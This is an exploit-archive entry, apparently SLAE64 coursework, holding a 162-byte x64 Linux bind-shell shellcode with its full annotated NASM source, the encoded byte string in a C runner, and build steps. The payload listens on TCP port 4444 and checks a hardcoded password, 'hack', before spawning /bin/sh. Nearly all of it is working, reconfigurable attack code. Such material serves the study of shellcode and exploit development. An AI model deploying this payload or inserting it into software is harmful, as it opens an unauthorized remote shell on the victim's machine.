tcp bindshell with password prompt in 162 bytes



EKU-ID: 5325 CVE: OSVDB-ID:
Author: Sathish kumar Published: 2016-01-04 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*---------------------------------------------------------------------------------------------------------------------
/*
*Title:            tcp bindshell with password prompt in 162 bytes
*Author:           Sathish kumar
*Contact:          https://www.linkedin.com/in/sathish94
*Description:      x64 Linux bind TCP port shellcode on port 4444 with reconfigurable password
*Tested On:        Ubuntu 14.04 LTS
*SLAE64-1408
*Build/Run:        gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
*                   ./bindshell
*                   nc localhost 4444
*
*/
  
/*
* NOTE: This C code binds on port 4444
* The top of this file contains the .nasm source code
* The Port can be Reconfigured According to your needs
* Instructions for changing port number
* Port obtainer change the port value accorddingly
*                   port.py
*                       import socket
*                       port = 4444
*                       hex(socket.htons(port))
*                   python port.py
*                   Result : 0x5c11
* Replace the obtained value in the shellcode to change the port number
* For building the from .nasm source use
*                   nasm -felf64 filename.nasm -o filename.o
*                   ld filename.o -o filename
* To inspect for nulls
*                   objdump -M intel -D filename.o
 
 
global _start
 
_start:
     
    jmp sock
    prompt: db 'Passcode' ; initilization of prompt data
    ; sock = socket(AF_INET, SOCK_STREAM, 0)
    ; AF_INET = 2
    ; SOCK_STREAM = 1
    ; syscall number 41
 
sock:
     
    xor rax, rax    ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
    xor rsi, rsi
    mul rsi      
    push byte 0x2   ;pusing argument to the stack
    pop rdi         ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
    inc esi         ; already rsi is 0 so incrementing the rsi register will make it 1
    push byte 0x29  ; pushing the syscall number into the rax by using stack
    pop rax
    syscall
     
    ; copying the socket descripter from rax to rdi register so that we can use it further
 
    xchg rax, rdi
     
    ; server.sin_family = AF_INET
    ; server.sin_port = htons(PORT)
    ; server.sin_addr.s_addr = INADDR_ANY
    ; bzero(&server.sin_zero, 8)
    ; setting up the data sctructure
     
    push 0x2                         ;AF_INET value is 2 so we are pushing 0x2
    mov word [rsp + 2],0x5c11        ;port 4444 htons hex value is 0x5c11 port values can be be obtained by following above instructions
    push rsp                         ; saving the complete argument to rsi register
    pop rsi                         
     
     
    ; bind(sock, (struct sockaddr *)&server, sockaddr_len)
    ; syscall number 49
     
    push rdx                        ; Inserting the null to the stack
    push byte 0x10                 
    pop rdx                         ; value of the rdx register is set to 16 size sockaddr
    push byte 0x31                  
    pop rax                         ; rax register is set with 49 syscall for bind
    syscall
     
    ;listen the sockets for the incomming connections   
    ; listen(sock, MAX_CLIENTS)
    ; syscall number 50
     
    pop rsi
    push 0x32
    pop rax                          ; rax register is set to 50 syscall for listen
    syscall
     
    ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
    ;syscall number 43
     
    push 0x2b
    pop rax                           ; rax register is set to 43 syscall for accept
    syscall
     
    ; storing the client socket description
    mov r9, rax
     
    ; close parent
    push 0x3
    pop rax                            ; closing the parent socket connection using close parent rax is set to 3 syscall to close parent
    syscall
 
    xchg rdi , r9
    xor rsi , rsi
 
    ; initilization of dup2
    push 0x3                          
    pop rsi                             ; setting argument to 3
 
 
 
duplicate:
    dec esi                           
    mov al, 0x21                       ;duplicate syscall applied to error,output and input using loop
    syscall
    jne duplicate
     
                                       ; Prompt for password
    xor rax, rax                     
    inc al                             ; rax register to value 1 syscall for write
    push rax   
    pop rdi                            ; rdi register to value 1
    lea rsi, [rel prompt]
    xor rdx, rdx                       ; xor the rdx register to clear the previous values
    push 0xe
    pop rdx
    syscall
     
                                       ; checking the password using read
password_check:
     
    push rsp
    pop rsi
    xor rax, rax   ; system read syscall value is 0 so rax is set to 0
    syscall
    push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
    pop rax
    lea rdi, [rel rsi]
    scasd           ; comparing the user input and stored password in the stack
    jne Exit
     
     
execve:                                      ; Execve format  , execve("/bin/sh", 0 , 0)
     xor rsi , rsi
     mul rsi                                 ; zeroed rax , rdx register
     push ax                                 ; terminate string with null
     mov rbx , 0x68732f2f6e69622f            ; "/bin//sh"  in reverse order
     push rbx
     push rsp
     pop rdi                                 ; set RDI
     push byte 0x3b                          ; execve syscall number (59)
     pop rax
     syscall
 
Exit:
 
     ;Exit shellcode if password is wrong
     push 0x3c
     pop rax        ;syscall number for exit is 60
     xor rdi, rdi
     syscall
      
*/    
 
 
#include<stdio.h>
#include<string.h>
 
unsigned char code[] = \
"\xeb\x08\x50\x61\x73\x73\x63\x6f\x64\x65\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02"
//Port number this can be obtained from the above instrcutions
"\x11\x5c"
"\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\xfe\xc0\x50\x5f\x48\x8d\x35\x9d\xff\xff\xff\x48\x31\xd2\x6a\x0e\x5a\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05"
//Password this can be obtained by
/*
 * python
 *          password = 'hack'
 *          (password[::-1]).encode('hex')
 *          Reuslt : 6b636168
 *  This is stored in reverse beacuse of stack
 *
 *
 */
"\x68\x68\x61\x63\x6b"
"\x58\x48\x8d\x3e\xaf\x75\x1a\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05";
 
 
main()
{
 
    printf("Shellcode Length:  %d\n", (int)strlen(code));
 
    int (*ret)() = (int(*)())code;
 
    ret();
 
}